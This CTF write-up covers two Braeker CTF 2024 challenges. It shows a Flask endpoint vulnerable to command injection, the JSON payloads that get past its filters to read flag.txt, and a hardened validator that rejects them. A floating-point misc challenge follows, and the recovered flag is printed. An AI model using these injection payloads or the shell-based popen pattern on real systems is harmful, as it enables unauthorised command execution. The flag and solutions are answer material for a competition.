Braeker CTF - 2024
2 challenges solved from Braeker CTF, web and misc
Empty execution - Web?
We are given a link that returns an invalid method error.

from flask import Flask, jsonify, request
import os

app = Flask(__name__)

# Run commands from leaderbot
@app.route('/run_command', methods=['POST'])
def run_command():
    # Get command
    data = request.get_json()
    if 'command' in data:
        command = str(data['command'])
        # Length check
        if len(command) < 5:
            return jsonify({'message': 'Command too short'}), 501
        # Perform security checks
        if '..' in command or '/' in command:
            return jsonify({'message': 'Hacking attempt detected'}), 501
        # Find path to executable
        executable_to_run = command.split()[0]
        # Check if we can execute the binary
        if os.access(executable_to_run, os.X_OK):
            # Execute binary if it exists and is executable
            out = os.popen(command).read()
            return jsonify({'message': 'Command output: ' + str(out)}), 200
    return jsonify({'message': 'Not implemented'}), 501

if __name__ == '__main__':
    # Make sure we can only execute binaries in the executables directory
    os.chdir('./executables/')
    # Run server
    app.run(host='0.0.0.0', port=80)

Inspecting the code, we notice that we need to submit a POST request with a command as JSON data; the command cannot contain '/' or '..', and its first word has to be executable. The first payload bypasses both the executable check and the '..' filter:
{
"command":". test.txt| ls -la .\\."
}
This will run '.' as bin/sh, which is executable. Now we execute a find statement: because flag.txt is one folder behind, we cannot cat it directly.

Command to cat flag:
{
"command":". test.txt | find .\\. -type f -name 'flag.txt' -exec cat {} \\;"
}
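
A hardened form of the endpoint's checks, as an added example that is not part of the challenge or the original write-up. It reproduces the three checks as a plain function, then parses the command before validating it and runs it without a shell; the names `PAGE_PAYLOAD`, `page_checks_pass`, `safe_argv` and `run_safely` are hypothetical.

```python
import os
import shlex
import subprocess

# Constructed sample: the page's first payload as the server sees it after JSON decoding.
PAGE_PAYLOAD = ". test.txt| ls -la .\\."

def page_checks_pass(command):
    """The challenge's three checks, reproduced without Flask (hypothetical name)."""
    if len(command) < 5:
        return False
    if '..' in command or '/' in command:
        return False
    # '.' is the current directory, and a searchable directory passes X_OK.
    return os.access(command.split()[0], os.X_OK)

def safe_argv(command, exec_dir):
    """Hardened check (hypothetical name): argv for a file inside exec_dir, or None."""
    try:
        argv = shlex.split(command)      # resolves quoting and backslashes first
    except ValueError:                   # unbalanced quotes
        return None
    if not argv:
        return None
    name = argv[0]
    if name in ('.', '..') or os.path.basename(name) != name:
        return None                      # program must be a bare file name
    root = os.path.realpath(exec_dir)
    path = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(path) != root:
        return None                      # symlink leading out of exec_dir
    if not (os.path.isfile(path) and os.access(path, os.X_OK)):
        return None                      # a directory is not a program
    return [path] + argv[1:]

def run_safely(command, exec_dir):
    """Run the validated argv without a shell; returns stdout, or None if rejected."""
    argv = safe_argv(command, exec_dir)
    if argv is None:
        return None
    # No shell: '|', ';' and '\' reach the program as literal argument text.
    done = subprocess.run(argv, cwd=exec_dir, capture_output=True, text=True, timeout=5)
    return done.stdout

if __name__ == "__main__":
    print(page_checks_pass(PAGE_PAYLOAD))   # original filter accepts the payload
    print(safe_argv(PAGE_PAYLOAD, "."))     # hardened check rejects it
```

Arguments are still passed through unchanged, so what an allowed executable does with a path such as `..` remains that program's responsibility.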

e - Misc
We needed to bypass 3 checks
The first one:
Welcome!
Number that is equal to two:
2.01
Well done!
This is the second round:
The second one:
This is the second round:
Number to add to 0.9 to make 1:
0.0999999
Great! Up to level three:
Lastly, we needed to append two numbers to a random list so that adding up the whole list gave 0. The name of the challenge was some kind of a clue: big numbers written with an e helped us keep the rest of the list from interfering with the addition, because the whole number was not checked, only the first numbers with the e+?
That's why the flag would be returned if the first number was something reaaaally big, and the second its negative.
$ nc 0.cloud.chals.io 30531
Welcome!
Number that is equal to two:
2.01
Well done!
This is the second round:
Number to add to 0.9 to make 1:
0.0999999
Great! Up to level three:
Number to add to array to equal zero:
2.0000e+23
Number to add to array to equal zero:
-2.0000e+23
Well done!
Here is the flag: brck{Th3_3pS1l0n_w0rkS_In_M15t3riOuS_W4yS}